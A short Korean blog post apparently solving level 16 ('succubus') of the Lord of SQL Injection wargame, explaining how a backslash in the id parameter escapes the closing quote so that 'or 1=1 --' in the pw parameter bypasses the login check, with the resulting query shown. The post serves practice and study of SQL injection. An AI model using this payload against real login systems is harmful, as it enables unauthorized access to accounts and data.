본문 바로가기
웹 해킹/lord of SQL

los 16번-답 참고!

by sonysame 2018. 6. 29.
query : {$query}

"; $result = @mysql_fetch_array(mysql_query($query)); if($result['id']) solve("succubus"); highlight_file(__FILE__); ?>

이전 문제는 ereg로 ' 을 확인해서 %00으로 우회할 수 있었지만 이번에는 preg_match로 확인을 한다!


'이 붙는 것을 \'이 되게끔 만들어서 문자열의 '으로 인식되게 한다!


?id=\&pw=or 1=1 --%20

query : select id from prob_succubus where id='\' and pw='or 1=1 -- '

'웹 해킹 > lord of SQL' 카테고리의 다른 글

los 15번  (0) 2018.06.29
los 14번  (0) 2018.06.28
los 13번  (0) 2018.06.28
los 12번  (0) 2018.06.28
los 11번  (0) 2018.06.28